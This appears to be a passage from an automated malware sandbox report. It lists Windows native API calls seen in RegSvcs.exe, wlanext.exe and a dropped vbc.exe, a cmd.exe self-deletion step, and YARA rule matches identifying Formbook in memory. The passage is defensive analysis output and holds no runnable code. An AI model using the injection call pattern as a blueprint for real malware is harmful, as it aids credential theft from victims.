          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFD8C NtDelayExecution,LdrInitializeThunk,6_2_008BFD8C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_008BFDC0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_008BFEA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_008BFED0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFFB4 NtCreateSection,LdrInitializeThunk,6_2_008BFFB4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C10D0 NtOpenProcessToken,6_2_008C10D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0060 NtQuerySection,6_2_008C0060
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C01D4 NtSetValueKey,6_2_008C01D4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C010C NtOpenDirectoryObject,6_2_008C010C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1148 NtOpenThread,6_2_008C1148
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C07AC NtCreateMutant,6_2_008C07AC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF8CC NtWaitForSingleObject,6_2_008BF8CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BF938 NtWriteFile,6_2_008BF938
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1930 NtSetContextThread,6_2_008C1930
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFAB8 NtQueryValueKey,6_2_008BFAB8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFA20 NtQueryInformationFile,6_2_008BFA20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFA50 NtEnumerateValueKey,6_2_008BFA50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFBE8 NtQueryVirtualMemory,6_2_008BFBE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFB50 NtCreateKey,6_2_008BFB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC30 NtOpenProcess,6_2_008BFC30
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFC48 NtSetInformationFile,6_2_008BFC48
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C0C40 NtGetContextThread,6_2_008C0C40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008C1D80 NtSuspendThread,6_2_008C1D80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFD5C NtEnumerateKey,6_2_008BFD5C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFE24 NtWriteVirtualMemory,6_2_008BFE24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFFFC NtCreateProcessEx,6_2_008BFFFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008BFF34 NtQueueApcThread,6_2_008BFF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F700C4 NtCreateFile,LdrInitializeThunk,9_2_01F700C4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F707AC NtCreateMutant,LdrInitializeThunk,9_2_01F707AC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F9F0 NtClose,LdrInitializeThunk,9_2_01F6F9F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F900 NtReadFile,LdrInitializeThunk,9_2_01F6F900
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBB8 NtQueryInformationToken,LdrInitializeThunk,9_2_01F6FBB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB68 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01F6FB68
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FB50 NtCreateKey,LdrInitializeThunk,9_2_01F6FB50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAE8 NtQueryInformationProcess,LdrInitializeThunk,9_2_01F6FAE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,9_2_01F6FAD0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FAB8 NtQueryValueKey,LdrInitializeThunk,9_2_01F6FAB8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FDC0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01F6FDC0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD8C NtDelayExecution,LdrInitializeThunk,9_2_01F6FD8C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC60 NtMapViewOfSection,LdrInitializeThunk,9_2_01F6FC60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFB4 NtCreateSection,LdrInitializeThunk,9_2_01F6FFB4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,9_2_01F6FED0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F701D4 NtSetValueKey,9_2_01F701D4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71148 NtOpenThread,9_2_01F71148
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7010C NtOpenDirectoryObject,9_2_01F7010C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F710D0 NtOpenProcessToken,9_2_01F710D0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70078 NtResumeThread,9_2_01F70078
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70060 NtQuerySection,9_2_01F70060
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70048 NtProtectVirtualMemory,9_2_01F70048
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71930 NtSetContextThread,9_2_01F71930
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F938 NtWriteFile,9_2_01F6F938
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6F8CC NtWaitForSingleObject,9_2_01F6F8CC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FBE8 NtQueryVirtualMemory,9_2_01F6FBE8
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA50 NtEnumerateValueKey,9_2_01F6FA50
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FA20 NtQueryInformationFile,9_2_01F6FA20
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F71D80 NtSuspendThread,9_2_01F71D80
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FD5C NtEnumerateKey,9_2_01F6FD5C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC90 NtUnmapViewOfSection,9_2_01F6FC90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F70C40 NtGetContextThread,9_2_01F70C40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC48 NtSetInformationFile,9_2_01F6FC48
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FC30 NtOpenProcess,9_2_01F6FC30
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FFFC NtCreateProcessEx,9_2_01F6FFFC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FF34 NtQueueApcThread,9_2_01F6FF34
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FEA0 NtReadVirtualMemory,9_2_01F6FEA0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F6FE24 NtWriteVirtualMemory,9_2_01F6FE24
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099D60 NtCreateFile,9_2_00099D60
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E10 NtReadFile,9_2_00099E10
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E90 NtClose,9_2_00099E90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099F40 NtAllocateVirtualMemory,9_2_00099F40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00099E8A NtClose,9_2_00099E8A
          Source: C:\Windows\SysWOW64\cmd.exeFile deleted: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003541BE4_2_003541BE
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003537384_2_00353738
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003509084_2_00350908
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00353C484_2_00353C48
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00350ED04_2_00350ED0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003525E84_2_003525E8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003537284_2_00353728
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003569304_2_00356930
          Source: C:\Users\Public\vbc.exeCode function: 4_2_003529C84_2_003529C8
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00356B844_2_00356B84
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00358DDF4_2_00358DDF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00350EC04_2_00350EC0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CA18914_2_00CA1891
          Source: C:\Users\Public\vbc.exeCode function: 4_2_00CA18A04_2_00CA18A0
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048759184_2_04875918
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048715934_2_04871593
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048765FF4_2_048765FF
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048786844_2_04878684
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048700074_2_04870007
          Source: C:\Users\Public\vbc.exeCode function: 4_2_048700484_2_04870048
          Source: C:\Users\Public\vbc.exeCode function: 4_2_0487C3B04_2_0487C3B0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_004010306_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D1606_2_0041D160
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041DAD46_2_0041DAD4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402D906_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E406_2_00409E40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00409E3C6_2_00409E3C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041D6866_2_0041D686
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041DF726_2_0041DF72
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0041E7CC6_2_0041E7CC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00402FB06_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CE0C66_2_008CE0C6
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008FD0056_2_008FD005
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D30406_2_008D3040
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E905A6_2_008E905A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0094D06D6_2_0094D06D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095D13F6_2_0095D13F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CE2E96_2_008CE2E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009712386_2_00971238
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009763BF6_2_009763BF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CF3CF6_2_008CF3CF
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F63DB6_2_008F63DB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D23056_2_008D2305
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D73536_2_008D7353
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0091A37B6_2_0091A37B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E14896_2_008E1489
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009054856_2_00905485
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095443E6_2_0095443E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0090D47D6_2_0090D47D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009735DA6_2_009735DA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009505E36_2_009505E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008EC5F06_2_008EC5F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D351F6_2_008D351F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009165406_2_00916540
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D46806_2_008D4680
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DE6C16_2_008DE6C1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0091A6346_2_0091A634
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009726226_2_00972622
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095579A6_2_0095579A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DC7BC6_2_008DC7BC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009057C36_2_009057C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096771D6_2_0096771D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0094F8C46_2_0094F8C4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096F8EE6_2_0096F8EE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DC85C6_2_008DC85C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F286D6_2_008F286D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0097098E6_2_0097098E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008D29B26_2_008D29B2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009649F56_2_009649F5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E69FE6_2_008E69FE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_009559556_2_00955955
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095394B6_2_0095394B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00983A836_2_00983A83
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0097CBA46_2_0097CBA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095DBDA6_2_0095DBDA
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008CFBD76_2_008CFBD7
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00956BCB6_2_00956BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008F7B006_2_008F7B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00972C9C6_2_00972C9C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095AC5E6_2_0095AC5E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096FDDD6_2_0096FDDD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00900D3B6_2_00900D3B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008DCD5B6_2_008DCD5B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00902E2F6_2_00902E2F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008EEE4C6_2_008EEE4C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0096CFB16_2_0096CFB1
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_00942FDC6_2_00942FDC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0095BF146_2_0095BF14
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008E0F3F6_2_008E0F3F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_008FDF7C6_2_008FDF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020212389_2_02021238
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7E0C69_2_01F7E0C6
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9905A9_2_01F9905A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F830409_2_01F83040
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020263BF9_2_020263BF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FAD0059_2_01FAD005
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA63DB9_2_01FA63DB
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7F3CF9_2_01F7F3CF
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCA37B9_2_01FCA37B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F873539_2_01F87353
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F823059_2_01F82305
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7E2E99_2_01F7E2E9
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9C5F09_2_01F9C5F0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020226229_2_02022622
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FC65409_2_01FC6540
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8351F9_2_01F8351F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F914899_2_01F91489
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB54859_2_01FB5485
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FBD47D9_2_01FBD47D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200579A9_2_0200579A
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB57C39_2_01FB57C3
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200443E9_2_0200443E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8C7BC9_2_01F8C7BC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8E6C19_2_01F8E6C1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F846809_2_01F84680
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FCA6349_2_01FCA634
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F969FE9_2_01F969FE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F829B29_2_01F829B2
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_02033A839_2_02033A83
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA286D9_2_01FA286D
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8C85C9_2_01F8C85C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202CBA49_2_0202CBA4
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200DBDA9_2_0200DBDA
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F7FBD79_2_01F7FBD7
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201F8EE9_2_0201F8EE
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FA7B009_2_01FA7B00
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0200394B9_2_0200394B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_020059559_2_02005955
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0202098E9_2_0202098E
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F8CD5B9_2_01F8CD5B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB0D3B9_2_01FB0D3B
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201CFB19_2_0201CFB1
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FF2FDC9_2_01FF2FDC
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FADF7C9_2_01FADF7C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F90F3F9_2_01F90F3F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01F9EE4C9_2_01F9EE4C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_01FB2E2F9_2_01FB2E2F
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0201FDDD9_2_0201FDDD
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009D1609_2_0009D160
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082D909_2_00082D90
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00089E3C9_2_00089E3C
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00089E409_2_00089E40
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_0009DF729_2_0009DF72
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 9_2_00082FB09_2_00082FB0
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F7E2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01F7DF5C appears 119 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FC3F92 appears 132 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FC373B appears 244 times
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 01FEF970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008CE2A8 appears 60 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0093F970 appears 84 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00913F92 appears 132 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 0091373B appears 253 times
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 008CDF5C appears 130 times
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151576407.0000000000480000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.2105696837.0000000003179000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000009.00000002.2400841842.00000000001E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.2151416810.0000000000150000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
